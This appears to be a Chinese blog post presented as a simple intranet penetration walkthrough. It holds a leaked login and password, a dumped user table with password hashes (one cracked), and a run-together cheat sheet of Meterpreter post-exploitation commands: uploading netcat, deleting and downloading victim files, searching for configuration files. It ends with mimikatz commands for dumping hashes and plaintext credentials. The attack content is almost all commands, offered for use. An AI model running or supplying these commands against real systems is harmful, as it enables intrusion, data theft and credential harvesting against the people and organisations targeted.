记一次简单易上手的内网渗透实战

登陆用户：
dada   
密码：mysql123
| a_id | a_user | a_pass                                      |
+------+--------+---------------------------------------------+
| 1    | admin  | fb0641386d3de664367b6a0b9f2ed5a2            |
| 2    | data   | ed54ae97e472d89f0227cba22158731a (mysql123) |
| 3    | kefu   | 17f3e52d5392ff8dc3c78b22db194f0d            |
+------+--------+---------------------------------------------+

help# 查看Meterpreter帮助background#返回，把meterpreter后台挂起bgkill# 杀死一个背景 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互，number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k  number #与会话进行交互close# 关闭通道exit# 终止 meterpreter 会话quit# 终止 meterpreter 会话interact id #切换进一个信道run#执行一个已有的模块，这里要说的是输入run后按两下tab，会列出所有的已有的脚本，常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等irb# 进入 Ruby 脚本模式

cat c:\boot.ini#查看文件内容,文件必须存在del c:\boot.ini #删除指定的文件upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上，如upload  setup.exe C:\\windows\\system32\download nimeia.txt /root/Desktop/   # 下载文件到本机上如：download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/edit c:\boot.ini  # 编辑文件getlwd#打印本地目录getwd#打印工作目录lcd#更改本地目录ls#列出在当前目录中的文件列表lpwd#打印本地目录pwd#输出工作目录cd c:\\ #进入目录文件下rm file #删除文件mkdir dier #在受害者系统上的创建目录rmdir#受害者系统上删除目录dir#列出目标主机的文件和文件夹信息mv#修改目标主机上的文件名search -d d:\\www -f web.config #search 文件，如search  -d c:\\  -f*.docmeterpreter > search -f autoexec.bat  #搜索文件meterpreter > search -f sea*.bat c:\\xamp\\enumdesktops     #用户登录数

meterpreter > load mimikatz  #加载mimikatzmeterpreter > msv #获取hash值meterpreter > kerberos #获取明文meterpreter >ssp   #获取明文信息meterpreter > wdigest #获取系统账户信息meterpreter >mimikatz_command -f a::   #必须要以错误的模块来让正确的模块显示meterpreter >mimikatz_command -f hash::   #获取目标 hashmeterpreter > mimikatz_command -f samdump::hashesmeterpreter > mimikatz_command -f sekurlsa::searchPasswords